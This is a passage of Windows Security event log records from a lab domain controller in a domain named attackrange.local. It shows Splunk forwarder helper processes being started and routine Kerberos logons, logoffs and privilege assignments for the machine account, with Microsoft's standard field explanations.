Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263627
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1260
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263626
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1860
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263628
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x735C99
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263631
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x737C5B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263630
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x737C5B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59908
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263629
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x737C5B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:17:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263632
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263634
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1664
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263633
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263635
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x167c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263636
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x2c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263638
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263637
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263644
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73AC7F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263643
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73AC7F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59915
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263642
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73AC7F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263641
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73AC13
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263640
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73AC13
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59914
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263639
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73AC13
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263647
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73B9A2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263646
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73B9A2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59924
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263645
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73B9A2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:18:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263648
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x568
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263650
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x191c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263649
